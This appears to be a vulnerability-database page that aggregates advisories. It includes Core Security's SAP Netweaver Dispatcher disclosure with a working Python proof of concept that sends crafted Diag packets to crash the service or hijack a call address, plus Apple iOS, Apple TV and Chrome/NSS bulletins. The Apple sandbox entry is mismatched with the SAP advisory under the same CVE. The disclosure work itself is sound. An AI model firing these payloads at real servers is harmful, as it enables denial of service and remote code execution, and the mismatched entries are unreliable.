VARIoT IoT vulnerabilities database
VAR-201111-0111 | CVE-2011-1516 |
Apple Mac OS X Network resource access vulnerability
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303.
An attacker can exploit this issue to bypass certain security restrictions and gain access to restricted functionality.
Apple Mac OS X 10.5.x, 10.6.x and 10.7.x are vulnerable; other versions may also be affected. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
SAP Netweaver Dispatcher Multiple Vulnerabilities
1. *Advisory Information*
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
3. *Vulnerability Description*
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. Multiple vulnerabilities have been found in
SAP Netweaver that could allow an unauthenticated, remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered sending specially crafted SAP Diag packets
to remote TCP port 32NN (being NN the SAP system number) of a host
running the "Dispatcher" service, part of SAP Netweaver Application
Server ABAP. By sending different messages, the different
vulnerabilities can be triggered.
4. *Vulnerable packages*
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
7. *Credits*
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
8. *Technical Description / Proof of Concept Code*
*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()
def send_packet(sock, packet):
packet = struct.pack("!I", len(packet)) + packet
sock.send(packet)
def receive(sock):
length = sock.recv(4)
(length, ) = struct.unpack("!I", length)
data = ""
while len(data)<length:
data+= sock.recv(length)
return (length, data)
def initialize(sock):
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
dpheader+=
"\x00\xff\xff\xff\xff\xff\xff "
dpheader+= "terminalXXXXXXX"
dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
send_packet(sock, dpheader + diagheader + user_connect + support_data)
def send_message(sock, message):
diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
eom = "\x0c"
send_packet(sock, diagheader + step + message + eom)
# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module process a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. This vulnerability
could allow a remote unauthenticated attacker to execute arbitrary code
with the privileges of the user running the "Dispatcher" service. The
following python code can be used to trigger the vulnerability:
/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/
8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*
[CVE-2011-1517] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/
8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*
[CVE-2012-2511] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceAtoms'. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/
8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*
[CVE-2012-2512] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceStreamI' and could allow a remote unauthenticated attacker to
conduct a denial of service attack.
/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/
8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*
[CVE-2012-2513] The vulnerability can be triggered by the vulnerable
function 'Diaginput', allowing a denial of service attack against the
vulnerable systems.
/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/
8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*
[CVE-2012-2514] The vulnerability can be triggered by the vulnerable
function 'DiagiEventSource' in the 'disp+work.exe' module. This
vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/
9. *Report Timeline*
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012. 2012-01-24:
Core sends an advisory draft with technical details. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies its
terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible. 2012-02-21:
First release date missed. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012. 2012-02-23:
Core re-schedules the advisory publication to May 8th. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received). 2012-05-07:
Core asks again for the status of the fix. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8]. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information. 2012-05-08:
Advisory CORE-2012-0123 published.
10. *References*
[1] http://www.sap.com/platform/netweaver/index.epx
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201110-0326 | CVE-2011-3243 | Apple iOS and Safari Used in WebKit Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5 and Safari before 5.1.1, allows remote attackers to inject arbitrary web script or HTML via vectors involving inactive DOM windows. WebKit is prone to a cross-domain scripting vulnerability because the application fails to properly enforce the same-origin policy.
Successful exploits will allow attackers to execute arbitrary script code within the context of the affected application. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Apple iOS Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA46377
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46377/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46377
RELEASE DATE:
2011-10-14
DISCUSS ADVISORY:
http://secunia.com/advisories/46377/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46377/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46377
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Apple iOS, which can
be exploited by malicious people with physical access to disclose
certain information and by malicious people to conduct script
insertion, cross-site scripting, and spoofing attacks, disclose
sensitive information, bypass certain security restrictions, cause a
DoS (Denial of Service), and compromise a user's device.
1) An error within the CalDAV component does not properly validate
the SSL certificate when synchronizing the calendar, which can be
exploited to disclose encrypted information e.g. using a
Man-in-the-Middle (MitM) attack.
2) Input passed via invitation notes is not properly sanitised in
Calendar before being returned to the user.
3) The CFNetwork component stores a user's AppleID password and
username in the log file readable by applications, which can be
exploited to disclose the credentials.
4) The CFNetwork component does not properly restrict cross-domain
access of HTTP cookies, which can be exploited to access the cookies
of another web site.
5) An error exists within CoreFoundation when handling string
tokenization.
For more information see vulnerability #1 in:
SA46339
6) Multiple errors within CoreGraphics when handling the certain
freetype fonts can be exploited to corrupt memory.
7) An error within CoreMedia does not properly handle cross-site
redirects and can be exploited to disclose video data.
8) An error exits within the Data Access component when handling
multiple accounts configured on the same server and can be exploited
to disclose the cookie of another account.
9) The application accepts X.509 certificates with MD5 hashes, which
could lead to weak cryptographic certificates being used. This can be
exploited to disclose encrypted information e.g. using a
Man-in-the-Middle (MitM) attack.
10) A design error exists within the implementation of SSL 3.0 and
TLS 1.0 protocols.
For more information:
SA46168
11) An error within ImageIO when handling CCITT Group 4 encoded TIFF
files can be exploited to cause a buffer overflow.
For more information see vulnerability #1 in:
SA43593
12) An error in ImageIO within the handling of CCITT Group 4 encoded
TIFF image files can be exploited to cause a heap-based buffer
overflow.
For more information see vulnerability #9 in:
SA45325
13) An error within ICU (International Components for Unicode) can be
exploited to cause a buffer overflow.
For more information see vulnerability #11 in:
SA45054
14) An error within the kernel does not reclaim memory from
incomplete TCP connections, which can be exploited to exhaust system
resources by connecting to a listening service and cause the device
to reset.
15) A NULL-pointer dereference error within the kernel when handling
IPv6 socket options can be exploited to cause the device to reset.
16) An error within libxml can be exploited to cause a heap-based
buffer overflow.
For more information see vulnerability #12 in:
SA45325
17) An error within OfficeImport when viewing certain Microsoft Word
files can be exploited to cause a buffer overflow.
18) An error within OfficeImport when viewing certain Microsoft Excel
files can be exploited to cause a buffer overflow.
19) An indexing error exists in the OfficeImport framework when
processing certain records in a Microsoft Word file.
For more information see vulnerability #19 in:
SA45054
20) An error in the OfficeImport framework when processing records
can be exploited to corrupt memory.
For more information see vulnerability #28 in:
SA43814
21) An error within Safari does not properly handle the "attachment"
HTTP Content-Disposition header and can be exploited to conduct
cross-site scripting attacks.
22) The parental restrictions feature stores the restrictions
passcode in plaintext on disk and can be exploited to disclose the
passcode.
23) An error within UIKit does not properly handle "tel:" URIs and
can be exploited to cause the device to hang by tricking the user
into visiting a malicious website.
24) Some vulnerabilities are caused due to a bundled vulnerable
version of WebKit.
For more information:
SA43519
SA43683
SA43696
SA43859
SA45097
SA45325
SA45325
SA45498
SA45498
SA46339
SA46412
25) The WiFi credentials are stored in a file readable by other
applications, which may lead to the credentials being disclosed.
SOLUTION:
Apply iOS 5 Software Update.
PROVIDED AND/OR DISCOVERED BY:
1) Leszek Tasiemski, nSense.
6, 9) Reported by the vendor.
The vendor credits:
2) Rick Deacon
3) Peter Quade, qdevelop
4) Erling Ellingsen, Facebook.
7) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR)
8) Bob Sielken, IBM
14) Wouter van der Veer, Topicus and Josh Enders
15) Thomas Clement, Intego
17) Tobias Klein via iDefense.
18) Tobias Klein, www.trapkit.de
21) Christian Matthies via iDefense and Yoshinori Oota, Business
Architects via JP/CERT.
22) An anonymous person
23) Simon Young, Anglia Ruskin University
25) Laurent OUDOT, TEHTRI Security
ORIGINAL ADVISORY:
Apple:
http://support.apple.com/kb/HT4999
nSense:
http://www.nsense.fi/advisories/nsense_2011_006.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201110-0323 | CVE-2011-3259 | Apple iOS and Apple TV Service disruption in some kernels (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The kernel in Apple iOS before 5 and Apple TV before 4.4 does not properly recover memory allocated for incomplete TCP connections, which allows remote attackers to cause a denial of service (resource consumption) by making many connection attempts. Apple TV and iOS kernel are prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to reset an affected device, and exhaust system resources. It could deny service to a legitimate user.
The following applications and systems are vulnerable:
Apple TV 4.0 through 4.3;
iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4;
iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later;
iOS 3.2 through 4.3.5 for iPad. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Apple iOS Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA46377
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46377/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46377
RELEASE DATE:
2011-10-14
DISCUSS ADVISORY:
http://secunia.com/advisories/46377/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46377/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46377
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Apple iOS, which can
be exploited by malicious people with physical access to disclose
certain information and by malicious people to conduct script
insertion, cross-site scripting, and spoofing attacks, disclose
sensitive information, bypass certain security restrictions, cause a
DoS (Denial of Service), and compromise a user's device.
1) An error within the CalDAV component does not properly validate
the SSL certificate when synchronizing the calendar, which can be
exploited to disclose encrypted information e.g. using a
Man-in-the-Middle (MitM) attack.
2) Input passed via invitation notes is not properly sanitised in
Calendar before being returned to the user. This can be exploited to
insert arbitrary HTML and script code, which will be executed in a
user's browser session in context of an affected site when the
malicious invitation is being viewed.
3) The CFNetwork component stores a user's AppleID password and
username in the log file readable by applications, which can be
exploited to disclose the credentials.
4) The CFNetwork component does not properly restrict cross-domain
access of HTTP cookies, which can be exploited to access the cookies
of another web site.
5) An error exists within CoreFoundation when handling string
tokenization.
For more information see vulnerability #1 in:
SA46339
6) Multiple errors within CoreGraphics when handling the certain
freetype fonts can be exploited to corrupt memory.
7) An error within CoreMedia does not properly handle cross-site
redirects and can be exploited to disclose video data.
8) An error exits within the Data Access component when handling
multiple accounts configured on the same server and can be exploited
to disclose the cookie of another account.
9) The application accepts X.509 certificates with MD5 hashes, which
could lead to weak cryptographic certificates being used. This can be
exploited to disclose encrypted information e.g. using a
Man-in-the-Middle (MitM) attack.
10) A design error exists within the implementation of SSL 3.0 and
TLS 1.0 protocols.
For more information:
SA46168
11) An error within ImageIO when handling CCITT Group 4 encoded TIFF
files can be exploited to cause a buffer overflow.
For more information see vulnerability #1 in:
SA43593
12) An error in ImageIO within the handling of CCITT Group 4 encoded
TIFF image files can be exploited to cause a heap-based buffer
overflow.
For more information see vulnerability #9 in:
SA45325
13) An error within ICU (International Components for Unicode) can be
exploited to cause a buffer overflow.
15) A NULL-pointer dereference error within the kernel when handling
IPv6 socket options can be exploited to cause the device to reset.
16) An error within libxml can be exploited to cause a heap-based
buffer overflow.
For more information see vulnerability #12 in:
SA45325
17) An error within OfficeImport when viewing certain Microsoft Word
files can be exploited to cause a buffer overflow.
18) An error within OfficeImport when viewing certain Microsoft Excel
files can be exploited to cause a buffer overflow.
19) An indexing error exists in the OfficeImport framework when
processing certain records in a Microsoft Word file.
For more information see vulnerability #19 in:
SA45054
20) An error in the OfficeImport framework when processing records
can be exploited to corrupt memory.
For more information see vulnerability #28 in:
SA43814
21) An error within Safari does not properly handle the "attachment"
HTTP Content-Disposition header and can be exploited to conduct
cross-site scripting attacks.
22) The parental restrictions feature stores the restrictions
passcode in plaintext on disk and can be exploited to disclose the
passcode.
23) An error within UIKit does not properly handle "tel:" URIs and
can be exploited to cause the device to hang by tricking the user
into visiting a malicious website.
24) Some vulnerabilities are caused due to a bundled vulnerable
version of WebKit.
For more information:
SA43519
SA43683
SA43696
SA43859
SA45097
SA45325
SA45325
SA45498
SA45498
SA46339
SA46412
25) The WiFi credentials are stored in a file readable by other
applications, which may lead to the credentials being disclosed.
Successful exploitation of vulnerabilities #6, #16 \x96 #20, and #24 may
allow execution of arbitrary code.
SOLUTION:
Apply iOS 5 Software Update.
PROVIDED AND/OR DISCOVERED BY:
1) Leszek Tasiemski, nSense.
6, 9) Reported by the vendor.
The vendor credits:
2) Rick Deacon
3) Peter Quade, qdevelop
4) Erling Ellingsen, Facebook.
7) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR)
8) Bob Sielken, IBM
14) Wouter van der Veer, Topicus and Josh Enders
15) Thomas Clement, Intego
17) Tobias Klein via iDefense.
18) Tobias Klein, www.trapkit.de
21) Christian Matthies via iDefense and Yoshinori Oota, Business
Architects via JP/CERT.
22) An anonymous person
23) Simon Young, Anglia Ruskin University
25) Laurent OUDOT, TEHTRI Security
ORIGINAL ADVISORY:
Apple:
http://support.apple.com/kb/HT4999
nSense:
http://www.nsense.fi/advisories/nsense_2011_006.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2011-10-12-2 Apple TV Software Update 4.4
Apple TV Software Update 4.4 is now available and addresses
the following:
Apple TV
Available for: Apple TV 4.0 through 4.3
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: Fraudulent certificates were issued by multiple
certificate authorities operated by DigiNotar. This issue is
addressed by removing DigiNotar from the list of trusted root
certificates, from the list of Extended Validation (EV) certificate
authorities, and by configuring default system trust settings so that
DigiNotar's certificates, including those issued by other
authorities, are not trusted.
Apple TV
Available for: Apple TV 4.0 through 4.3
Impact: Support for X.509 certificates with MD5 hashes may expose
users to spoofing and information disclosure as attacks improve
Description: Certificates signed using the MD5 hash algorithm were
accepted by iOS. This algorithm has known cryptographic weaknesses.
Further research or a misconfigured certificate authority could have
allowed the creation of X.509 certificates with attacker controlled
values that would have been trusted by the system. This would have
exposed X.509 based protocols to spoofing, man in the middle attacks,
and information disclosure. This update disables support for an X.509
certificate with an MD5 hash for any use other than as a trusted root
certificate.
CVE-ID
CVE-2011-3427
Apple TV
Available for: Apple TV 4.0 through 4.3
Impact: An attacker could decrypt part of a SSL connection
Description: Only the SSLv3 and TLS 1.0 versions of SSL were
supported. These versions are subject to a protocol weakness when
using block ciphers. A man-in-the-middle attacker could have injected
invalid data, causing the connection to close but revealing some
information about the previous data. If the same connection was
attempted repeatedly the attacker may eventually have been able to
decrypt the data being sent, such as a password. This issue is
addressed by adding support for TLS 1.2.
CVE-ID
CVE-2011-3259 : Wouter van der Veer of Topicus I&I, and Josh Enders
Apple TV
Available for: Apple TV 4.0 through 4.3
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: A one-byte heap buffer overflow existed in libxml's
handling of XML data.
CVE-ID
CVE-2011-0216 : Billy Rios of the Google Security Team
Apple TV
Available for: Apple TV 4.0 through 4.3
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in JavaScriptCore.
CVE-ID
CVE-2011-3232 : Aki Helin of OUSPG
Installation note:
Apple TV will periodically check for software updates.
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.16 (Darwin)
iQEcBAEBAgAGBQJOlcwaAAoJEGnF2JsdZQeegxcIAKElICLSw74Dj2vV1uDzwh8f
6cOg/AKME1KB80rFgkHymBZM4t1mrLhwYLFs5w8oFRbbL02fxAxhw/DRWYHoqWHw
mPR7A2Alg7fwX4FAyhJ/EVb8/szUvRsS9YD2AxOZeDdQdw+40mP5rYgx+dkURuag
Rx6S5M4LaQ7A0/yfnRhUCWc6Er78LIcFxkjY4XEHwRuOR0jOnZyHSI1wx1UAvkam
HeWtRLnamHSANnZhQhrp+cesGRI5HrbbFHGJgc1nBIGZz65qgk3ZOKGh9MPBMrGm
ISg0lZHs/5gVKBFmkaMj1wyMAdsaDezWov01Bqz/UrMVuqo/7sjO4Is8x99W0EE=
=AlFT
-----END PGP SIGNATURE-----
VAR-201110-0267 | CVE-2011-3640 | Windows and Mac OS X Run on Google Chrome Used in Mozilla Network Security Services Vulnerability gained in |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Untrusted search path vulnerability in Mozilla Network Security Services (NSS), as used in Google Chrome before 17 on Windows and Mac OS X, might allow local users to gain privileges via a Trojan horse pkcs11.txt file in a top-level directory. NOTE: the vendor's response was "Strange behavior, but we're not treating this as a security bug.". ** Unsettled ** This case has not been confirmed as a vulnerability. Supplementary information : CWE Vulnerability type by CWE-426: Untrusted Search Path ( Unreliable search path ) Has been identified. http://cwe.mitre.org/data/definitions/426.html The vendor responds as follows. "It's strange behavior, but I don't think it's a security bug."Local users can use the top-level directory Trojan pkcs11.txt It may be possible to get permission through the file. Mozilla Network Security Services (NSS) is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted security module. Mozilla is a publicly released, free to use, open source WEB browser that can run on most Unix/Linux systems, as well as MacOS and Microsoft Windows 9x/ME/NT/2000/XP. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201301-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Mozilla Products: Multiple vulnerabilities
